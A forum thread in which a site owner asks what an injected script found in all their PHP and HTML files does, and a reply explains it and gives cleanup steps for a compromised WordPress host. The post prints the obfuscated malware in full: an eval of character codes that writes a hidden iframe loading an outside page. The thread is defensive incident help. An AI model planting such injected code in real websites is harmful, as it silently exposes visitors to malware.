Websites compromised: This code added to all HTML and PHP documents

Hello, I am not sure if this is the right forum. But I thought somebody could help me by just telling me what this code does. My websites went down because this code broke the PHP pages. That's why I decided to inspect the code and I found that the following had been injected into every single PHP and HTML document on my server.

It's a java code, which I am not familiar with, so if somebody could just tell me what the code does, I'd be very grateful.

Thanks.

Code:

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,103,103,101,51,61,34,98,111,111,114,34,59,118,97,114,32,119,51,52,53,61,34,109,34,59,118,97,114,32,114,101,54,61,34,97,110,115,106,101,119,101,108,108,101,114,115,46,34,59,118,97,114,32,114,114,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,105,115,39,43,39,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,50,49,50))</script>

 

It's a hack. It ended up in my Godaddy hosting account, but I'm not really sure where it came from. It does exist in at least one other wordpress blog I found hosted by godaddy.

As near as I can tell, it launches a 1 pixel square iframe that calls up a website that could plant a virus, but apparently doesn't. At least not one that's detectable by AVG. It came to my attention because Google chrome flashed an infection message when I accessed my web site.

Apparently Kapersky also detects it.

I think it may come from the hosting company because it also showed up in the "stats" files, which are not writable by me.

I changed the secret key in Wordpress. I made all of the files in the html directory read only and I changed all of the account passwords. I have left a few non-public dummy html files in the directory writeable. No re-infection yet, but it took a couple days for the problem to recur last time I cleaned up the mess.

Cleaning up the problem just required going through all the files and removing the line of javascript. An aid to that was wordpress exploit scanner plugin, which is out of date, so you should search for the javascript string above and forget the rest of the error messages.

To save some time you might want to back up your wp-config file (make sure it's clean) and then re-upload a clean copy of wordpress. That will leave you just cleaning your theme and any occasional html files you might have lying around.

I'll come back here if I get any more info. To make sure you're clean.... Use Google chrome, because it does detect the exploit.